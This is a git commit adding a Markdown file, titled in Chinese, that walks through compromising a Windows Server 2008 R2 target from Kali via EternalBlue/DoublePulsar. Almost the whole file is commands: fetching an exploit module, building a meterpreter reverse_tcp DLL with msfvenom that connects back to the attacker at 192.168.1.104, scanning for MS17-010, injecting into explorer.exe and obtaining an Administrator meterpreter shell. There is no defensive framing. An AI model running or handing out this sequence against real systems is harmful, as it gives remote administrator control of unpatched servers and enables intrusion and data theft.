
Commit a233256

committed
基于kali利用Eternalblue的win服务器入侵过程
1 parent 4ad695a commit a233256

1 file changed

Lines changed: 50 additions & 0 deletions


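--- a/Eternalblue.md
+++ b/Eternalblue.md
@@ -0,0 +1,50 @@
+基于kali利用Eternalblue的win服务器入侵过程
+目标:cn_windows_server_2008_r2_standard_enterprise_datacenter_web_x64
+
+```
+# sudo dpkg --add-architecture i386
+# apt-get update
+# apt-get install winetricks
+# wine --version
+# apt-get install wine32
+
+# wget -c -O Eternalblue-Doublepulsar-Metasploit.zip https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/archive/master.zip
+# unzip Eternalblue-Doublepulsar-Metasploit.zip
+
+# service postgresql start
+
+# ifconfig
+# mkdir -p /root/.wine/drive_c/
+# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=4444 -f dll > /root/.wine/drive_c/eternal11.dll
+
+# netdiscover
+
+# msfconsole
+msf > use auxiliary/scanner/smb/smb_ms17_010
+msf auxiliary(smb_ms17_010) > options
+msf auxiliary(smb_ms17_010) > set RHOSTS 192.168.1.107
+msf auxiliary(smb_ms17_010) > run
+
+# cd Eternalblue-Doublepulsar-Metasploit-master/
+# cp eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/
+# cd deps
+# pwd
+
+> back
+> reload_all
+msf exploit(eternalblue_doublepulsar) > use exploit/windows/smb/eternalblue_doublepulsar
+msf exploit(eternalblue_doublepulsar) > options
+msf exploit(eternalblue_doublepulsar) > set DOUBLEPULSARPATH /root/Eternalblue-Doublepulsar-Metasploit-master/deps
+msf exploit(eternalblue_doublepulsar) > set ETERNALBLUEPATH /root/Eternalblue-Doublepulsar-Metasploit-master/deps
+msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT explorer.exe
+msf exploit(eternalblue_doublepulsar) > set RHOST 192.168.1.107
+msf exploit(eternalblue_doublepulsar) > set TARGETARCHITECTURE x64
+msf exploit(eternalblue_doublepulsar) > show targets
+msf exploit(eternalblue_doublepulsar) > set target 7
+msf exploit(eternalblue_doublepulsar) > set PAYLOAD windows/x64/meterpreter/reverse_tcp # 32bit: set PAYLOAD windows/meterpreter/reverse_tcp
+msf exploit(eternalblue_doublepulsar) > set LHOST 192.168.1.104
+msf exploit(eternalblue_doublepulsar) > exploit
+
+meterpreter > getuid
+Server username: WIN-2E66MFMUV4B\Administrator
+```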
